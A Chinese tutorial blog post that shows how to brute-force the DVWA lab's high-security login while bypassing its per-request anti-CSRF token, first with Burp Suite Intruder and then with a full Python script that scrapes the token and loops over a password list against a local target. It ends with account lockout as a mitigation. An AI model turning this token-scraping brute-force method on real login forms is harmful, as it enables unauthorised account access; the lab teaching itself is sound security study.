资讯专栏INFORMATION COLUMN

暴力破解绕过token限制

Ververica / 1302人阅读

记录一下在爆破的时候绕过token限制的方法

BurpSuite

1.使用burp抓包
bp抓包如下,DVWA高等级暴力破解漏洞靶场进行演示,(注意:这里抓到的包不要点击forward)

2.配置
发送到intruter模块,并对需要爆破的目标位置进行设置。(这里主要是为了演示绕过token限制,所以假设已知用户名为admin),选择集成炸弹。

方便演示,给password简单设置个字典

user_token需要从页面中获取
步骤:options->add->选中user_token的值。

设置跟随重定向,方法如下:options->redirection设置always

给token加上payload

结果匹配Welcome字符串。

3.爆破
点击attack开始爆破,报错。

显示多线程冲突,修改payload1为单线程即可;

爆破成功,密码password,成功绕过。
解决方法:当检测到频繁的错误登录后,将账户锁定,爆破也就无法继续。

Python

#-*-coding:utf-8-*-import requestsfrom bs4 import BeautifulSoupurl = "http://127.0.0.1/DVWA/vulnerabilities/brute/index.php?username={0}&password={1}&Login=Login&user_token={2}"headers = {    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0"}cookies = {    "security":"high",    "PHPSESSID":"a5ta238sbggu66lnigk48074c0"}payloads = [    "123456",    "whoami",    "password",    "langren",    "lianxiang",    "pwdls",    "admin"]def burp(payloads,url):    #获得user_token    source = "http://127.0.0.1/DVWA/vulnerabilities/brute/index.php"    web_data = requests.get(source, headers=headers, cookies=cookies)    soup = BeautifulSoup(web_data.text, "html.parser")    user_token = soup.select("input[name="user_token"]")[0]["value"]    # 爆破    for payload1 in payloads:        for payload2 in payloads:            target = url.format(payload1, payload2, user_token)            print u"当前请求:" + target            web_data = requests.get(target, headers=headers, cookies=cookies)            soup = BeautifulSoup(web_data.text, "html.parser")            user_token = soup.select("input[name="user_token"]")[0]["value"]            feature = soup.find("pre")            try:                if feature.get_text() == "Username and/or password incorrect.":  # 错误的密码或者用户名就会页面会出现此语句,这也是我们需要检索的                    print u"错误"            except:                print u"可能得到结果:"                print "username:" + payload1 + "/n" + "password:" + payload2                exit(u"结束")if __name__ == "__main__":    burp(payloads,url)

爆破成功

参考文章:https://www.cnblogs.com/qi-yuan/p/12395524.html

仅供学习使用!

文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。

转载请注明本文地址:https://www.ucloud.cn/yun/118948.html

相关文章

  • 安全开发笔记

    摘要:登录注册安全风险登录注册的风险点主要有四个暴力破解撞库遍历注册用户批量注册。引入了验证码机制同样引入了额外的安全风险,比如短信验证码的短信炸弹风险图形验证码的可绕过可识别等。 概述 很多技术研发不了解安全,也不重视安全,只有在自己的服务器被黑掉、被挂马、被脱裤才想起关注安全,但是这个时候,技术架构已经成型、代码已经在线上稳定运行,再亡羊补牢,改代码、改策略,往往成本巨大、确收效很低。所...

    Cruise_Chan 评论0 收藏0
  • GitChat · 安全 | 聊聊 「密码找回」

    摘要:微信任意用户密码修改漏洞漏洞描述在微信官方的首页上发现了找回密码功能。选择通过手机号码找回密码。提交成功,输入新密码。网易邮箱可直接修改其他用户密码描述这次我们看一个邮箱的找回密码漏洞,这个还真和上面的方式有点不一样。 来自 GitChat 作者:汤青松更多使用技术,尽在微信公众号:GitChat技术杂谈 进入 GitChat 阅读原文 WEB安全用户密码找回多案例安全攻防实战 这次文...

    YorkChen 评论0 收藏0
  • 当我们在谈论前端加密时,我们在谈些什么

    摘要:所以我们今天只谈前端加密,一个部分人认为没有意义的工作。在中,认证过程使用了非对称加密算法,非认证过程中使用了对称加密算法。非对称加密上文中我们讨论了前端的哈希加密以及应用的场景。 showImg(https://segmentfault.com/img/bVAhTC); 当然在谈安全。 前端安全是Web安全的一部分,常见的安全问题会有XSS、CSRF、SQL注入等,然而这些已经在程师...

    wizChen 评论0 收藏0
  • Sqlmap入土详解

    摘要:注入常用参数参数作用扫描指定的地址,判断是否存在注入存储数据库的表中条目获取当前用户下所有数据库名称获取数据库的所有用户查询表查询字段指定数据库名指定表名指定字段名其余参数参数作用显示帮助显示高级帮助显 Sqlmap注入常用参数 参数作用-u [url]扫描指定的URL地址,判断是否存在注入...

    gplane 评论0 收藏0
  • 「构建安全的 PHP 应用」读书笔记

    摘要:书名构建安全的应用作者美译者张庆龙以下记录这本安全小书的大致内容,对书中的知识点进行备忘。可以保证内容的安全性,使得只有最终传递到的具有有效证书的接收者才能得到这一内容。缺省安全及跨站攻击缺省安全我们应该为验 书名:构建安全的 PHP 应用 作者:(美) Ben Edmunds 译者:张庆龙 以下记录这本 PHP Web 安全小书的大致内容,对书中的知识点进行备忘。 不要相信任何用...

    kviccn 评论0 收藏0

发表评论

0条评论

Ververica

|高级讲师

TA的文章

阅读更多
最新活动
阅读需要支付1元查看
<